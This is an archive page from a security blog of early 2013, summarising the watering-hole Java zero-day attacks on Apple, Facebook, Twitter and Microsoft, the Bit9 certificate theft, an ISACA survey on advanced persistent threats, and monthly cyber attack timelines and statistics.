Archive
Microsoft Joins the Party of the Hacked Companies
With a scant statement on its Microsoft Security Response Center blog, the giant of Redmond has admitted to have been targeted by the same Cyber Attack that also hit Facebook and Apple.
“Consistent with our security response practices”, the company chose not to make a detailed statement during the initial information gathering process. According to the few information available, a small number of computers, including several machine in the Mac business unit, were infected by malicious software using techniques similar to those documented by other organizations.
This suggests that the company was probably the victim of the exploit injected through the compromising of the iPhoneDevSDK Forum. Apparently there is no evidence of customer data being affected while the investigation is ongoing.
Only the last example of an endless trail of high-profile security breaches.
1-15 February 2013 Cyber Attacks Statistics
It is time for the statistics related to the Cyber Attacks occurred during the first half of January and inserted into the the corresponding timeline.
The Daily Trend of Attacks shows two major peaks, during the 3rd of February (corresponding to the wave of DDoS attacks against Egypt Governmental targets carried on in name of OpEgypt), and just at the end of the month, when the attacks in name of OpKashmir became stronger. A third peak is visible during the 8th and, not a coincidence, it is still due to hacktivism, and in particular to the so-called OpBankUnderAttack.
The Motivations Behind Attacks Chart confirms the trend consolidated in January with Hacktivism still at the top with exactly the same percentage (56%). Cyber Crime Ranks at the second please with one half of the occurrences (28%). It is interesting to notice the Cyber Espionage that has reached its higher value (9%), maybe a consequence of the hype surrounding APT that is characterizing this period. For the first time I also had to insert a new motivation: Art. Frankly I did not find any other way to explain the Democratization of the Offshore Business made by the Italian Artist Paolo Cirio.
SQL Injection keeps on leading the chart related to the Distribution Of Attack Techniques with 31% of occurrences, almost double than DDoS at the second place with 15.6%. It is particularly interesting to notice the presence of Targeted Attacks at the third place, the higher rank ever reached so far. Media hype on the wake of the clamorous attacks of the last days, or a real increased effectiveness of the technologies that allow to detect an increasingly growing number of attacks belonging to this class of threats?
Last but not least, the Distribution of Targets Chart confirms governmental targets at the first place with nearly 30%, immediately followed by, as usual, industries (18.8%) and organizations (12.5%). In any case the level of attention of crooks is also high against targets belonging to the Financial and News sector, which steadily rank respectively at number 4 and 5 of this unwelcome chart with the 10.9% and 9.4%. The others follow….
As usual, no need to remind that the sample must be taken very carefully since it refers only to discovered attacks included in the 1-15 February 2013 Cyber Attacks Timeline (the so-called tip of the iceberg), and hence it does not pretend to be exhaustive but only aims to provide an high level overview of the “cyber landscape”.
If you want to have an idea of how fragile our data are inside the cyberspace, have a look at the timelines of the main Cyber Attacks in 2011, 2012 and now 2013 (regularly updated). You may also want to have a look at the Cyber Attack Statistics, and follow @paulsparrows on Twitter for the latest updates.
Also, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts).
After Twitter and Facebook, Apple reveals to have suffered the same Cyber Attack
The same sophisticated cyber attack that has targeted Facebook and Twitter has also targeted Apple, according to an exclusive revelation by Reuters. In this latest occurrence, the attackers were able to infect several Mac computers belonging to some employees of Cupertino, exploiting the same 0-Day Java vulnerability used to carry on the attacks against the two well known social networks.
Further details have emerged in the meantime: particularly noticeable is the fact that the attackers used the consolidated “watering hole” technique, compromising a well-known mobile developer forum (iphonedevsdk.com) accessed by the employees of Cupertino (and of many other high profile companies). This has raised the concern that maybe the attackers aimed to manipulate the code of smartphone apps to compromise a huge number of users. Currently the forums shows a banner inviting users to change their passwords.
Apple is working closely with the Federal Bureau of Investigation and has released an update to disable its Java SE 6. Although there is no clear evidence about the Chinese origin of the attack, unfortunately it comes out in the worst possible period: after the wave of attacks against U.S. Media, Mandiant, the firm that investigated the attack against the NYT, released a detailed report suggesting a link between the hacks against U.S. assets. and the Chinese Army.
1-16 February 2013 Cyber Attacks Timeline
Here is the summary of the Cyber Attacks Timeline for February. A month that will probably be remembered for the “sophisticated” cyber attacks to the two main social networks: Facebook and Twitter.
But the attacks against the two major social networks were not the only remarkable events of this period. Other governmental and industrial high-profile targets have fallen under the blows of (state-sponsored) cyber criminals: the list of the governmental targets is led by the U.S. Department of Energy and the Japan Ministry of Foreign Affairs, while Bit9, a primary security firm, was also targeted, leading the chart of Industrial targets.
Hacktivists have raised the bar and breached the Federal Reserve, leaking the details of 4,000 U.S. Banks executives. Similarly, the Bush family was also targeted, suffering the leak of private emails.
Even if the list is not as long as the one of January, it includes other important targets, so, scroll it down to have an idea of how fragile our data are inside the cyberspace. Also have a look at the timelines of the main Cyber Attacks in 2011, 2012, 2013, and the related statistics (regularly updated), and follow @paulsparrows on Twitter for the latest updates.
Also, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts). To do so, you can use this form.
Facebook Admits to Have Been Hit By a Sophisticated Targeted Attack
A couple of weeks after similar revelations made by Twitter, Facebook has joined the unwelcome list of Social Networks hit by targeted attacks.
This news has shaken this quiet week end of February, as Facebook officials told to Ars Technica they discovered in January several computers belonging to mobile application developers hacked using a zero-day Java attack. According to a consolidated attack schema, the malware installed a collection of previously unseen malware.
The attack occurred within the same timeframe as the hack that hit Twitter and exposed cryptographically hashed passwords of 250,000 users, and apparently targeted other companies completely unaware of the attack, until they were notified by Facebook.
According to the information available the attack showed several interesting (and nowadays common) patterns:
- The attackers used a “watering hole” attack, compromising the server of a popular mobile developer Web forum and using it to spring the zero-day Java exploit on site visitors. The attack was injected into the site’s HTML, affecting any visitor who had Java enabled in his browser, regardless of the level of patching of the machine.
- The exploit was used to download malware to victims’ computers affecting both Windows and Apple computers.
- As usual, I would say, Antivirus software was unable to detect the malware, neither the malware was slowed down by the fact that the machines were patched.
Facebook said it is working with FBI to investigate the attack. Only the latest example of a class of targeted sophisticated threats increasingly common and aggressive against high-profile targets including tech industries, media, and now social networks. As a matter of fact (state sponsored ?) cyber criminals are actively exploiting 0-Day vulnerabilities targeting Java (and Adobe Flash), in this 2013 that, in only two months, is proving to be dramatic for the Infosec Landscape.
Advanced Persistent Threats Are Among Us, Survey Reveals
They are among us! ISACA has just released its Advanced Persistent Threat Awareness Report. The study presents the results of a survey undertaken by ISACA in the fourth quarter of 2012 with a sample of information security professionals including information security managers in different industries and organizations throughout the world (1,551 individuals globally, representing more than 20 industries).
The results of the survey are interesting to measure the level of awareness, but not so encouraging (and in several circumstances also contradictory) for other aspects:
- The survey results reveal that 25.1% of respondents are very familiar with APTs, although (somehow in contradiction with the previous statement), 53.4% of respondents indicated that they do not believe APTs differ from traditional threats.
- 89.7% of respondents believe that the use of social networking sites increases the likelihood of a successful APT attack.
- 87.3% think that BYOD, combined with rooting or jailbreaking makes a successful APT attack more likely.
- The biggest risk for the enterprise is the Loss of Intellectual Property (25.5%) and the Loss of Personal Information (23.6%). Reputational damage is the third biggest risk (20.5%).
- Only 21.6% of respondents reported having been subject to an APT attack, but 63% of them believes that it is only a matter of time before their enterprise is targeted.
- In any case, nearly 60% of respondents believe that they are ready to respond to APT attacks. Of those: 14% responded that they are “very prepared,” which indicated that they have a documented and tested plan in place for APT. Another 49.6% responded that they have an incident management plan although it does not specifically cover APT.
But in my opinion, the most surprising finding is the fact that, from a technological point of view, a very high percentage (above 90%) of surveyed responded that they are using antivirus and anti-malware and/or traditional network perimeter technologies to thwart APTs. Other kinds of technologies (Sandboxing, Event Correlation, Mobile or Traditional Endpoint Control, Remote access), have a much lower impact (below 60%).
Contradictory results that show a high awareness about Advanced Persistent Threats, but maybe more from a marketing point of view than from a substantial perspective. As a matter of fact more than one half of the sample does not consider APTs different from the other threats. This explains the high value of respondents who leverage traditional technologies to (believe to) thwart this class of threats.
January 2013 Cyber Attacks Statistics
Here are the statistics related to the Cyber Attacks included inside the January 2013 Cyber Attacks Timelines. A terrible month that has seen an unprecedented number of Cyber Attacks.
The Daily Trend Of Attacks emphasizes the peak in the second half of January, in particular the 24th has seen a surprisingly high rate due to the massive (and last, at least so far) wave of DDoS attacks against the U.S. Banks.
The Motivations Behind Attacks Chart confirms the influence of hacktivism in this early 2013. More than half of the attacks (more precisely the 56%) were motivated by this reason. From this point of view the new year begins in a complete different way than 2012 when, despite the peak of attacks on the wake of the Megaupload shutdown, Cyber Crime led the chart with the 54% (against the 40% motivated by Hacktivism).
Easily predictable, the plenty of attacks against U.S. Banks has brought the DDoS on top of the Distribution Of Attack Techniques Chart with almost the 40% of occurrences. SQLi follows closely with the 33%. It is interesting to notice the relatively high impact of Targeted Attacks (3.8%) mainly due to the sudden disclosure of (purported) Chinese Cyber Attacks against U.S. Media.
Again, the attacks against U.S. Banks push the finance targets on top of the Distribution Of Targets Chart, ten points ahead of Governmental targets that, at least for this time, rank at the second place with the 21% of occurrences. Targets belonging to industry rank at the third place with the 13%.
Even in this promising 2013, no need to remind that the sample must be taken very carefully since it refers only to discovered attacks included in the January 2013 Cyber Attacks Timeline (the so-called tip of the iceberg), and hence it does not pretend to be exhaustive but only aims to provide an high level overview of the “cyber landscape”.
If you want to have an idea of how fragile our data are inside the cyberspace, have a look at the timelines of the main Cyber Attacks in 2011, 2012 and now 2013 (regularly updated). You may also want to have a look at the Cyber Attack Statistics, and follow @paulsparrows on Twitter for the latest updates.
Also, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts).
Certificates From Leading Security Vendor Bit9 Used to Sign Malware
Another high-profile security company has been breached. Bit9, a leading provider of application whitelisting technology, has admitted to have been attacked by a malicious external third party who was able to illegally gain access to one of their digital code-signing certificates. The attackers did not waste time and the compromised certificate has immediately been used to sign malware infiltrating, according to the company’s investigation, the network of three customers.
The news was initially revealed by Brian Krebs in a blog post, and later confirmed by the security vendor, which also gave additional (scant) details, including the fact that the malicious attackers were able to infiltrate a portion of their internal network not protected by their product.
“We simply did not follow the best practices we recommend to our customers by making certain our product was on all physical and virtual machines within Bit9.“
At first glance the attack has many points in common with the infamous RSA Breach of 2011, including the fact that maybe the real target of the attack was not the company itself, but the protected network of its customers. On the other hand, if it is true, as the company claims, that Bit9 was the only security company capable to stop both the Flame malware and the RSA breach attack, to achieve their target, the attackers had no other chance than attacking the source of their technology.
The latest demonstration, if necessary, that attacks are becoming more and more aggressive and sophisticated, and the protection is not only a matter of technology but even of good procedures and best practice, and not only for the possible victims…
16-31 January 2013 Cyber Attacks Timeline
Two Weeks Living Dangerously! I have no other words to describe this second half of January (first two weeks here) that has shown an unprecedented level of attacks! And if a good day starts with the morning, this will be a very troubled year from an information security perspective.
Not only the peaks of DDoS attacks against the US Banks have reached an unstoppable peak, but, most of all, at the end of the month details have been unveiled about a massive cyber-espionage campaign allegedly orchestrated by Chinese hackers against some major US media including The New York Times, The Wall Street Journal, The Washington Post and Bloomberg News.
A very very long list of targets this month, with some high profile victims such as the U.S. Sentencing Commission, whose web site has been hacked twice and turned into an Asteroid game, but also Renault Argentina that suffered 37,000 accounts leaked.
To summarize this month is really impossible, you just have to scroll down the timeline to realize the hacking spree in this January 2013.
If this trend continues, I will have to decrease the frequency of publication…
If you want to have an idea of how fragile our data are inside the cyberspace, have a look at the timelines of the main Cyber Attacks in 2011 and 2012 and the related statistics (regularly updated), and follow @paulsparrows on Twitter for the latest updates.
Also, feel free to submit remarkable incidents that in your opinion deserve to be included in the timelines (and charts). To do so, you can use this form.
I am Terribly Late!
WTF! This month I am terribly late with the Cyber Attack Timeline. I can anticipate that, as you will have probably guessed, this month we have seen an unprecedented rate of attacks.
I have already compiled the timeline of January, I still need a little bit of time to check it and to write the comments as usual. I still do not know if I will be able to publish it today or tomorrow (I am quite busy this afternoon) but, maximum at 12:00 CET of tomorrow it will be here.
Thanks for your patience, and please continue to support my work with your visits!
About The Author
Support My Work!
Share:
News
08/13/2011 - My Post on Android Malware Mentioned on Engadget.
04/14/2011 - The Article Smart Grid: L'ultima Frontiera del Cybercrime published on ICT Security Magazine May 2011.
03/14/2011 - Security Summit 2011: Paolo Passeri guest at Round Table "Mobile Security: Rischi, Tecnologie, Mercato"
02/14/2011 - The Article Gears of Cyberwar published on ICT Security Magazine January 2011.
Visitors from…
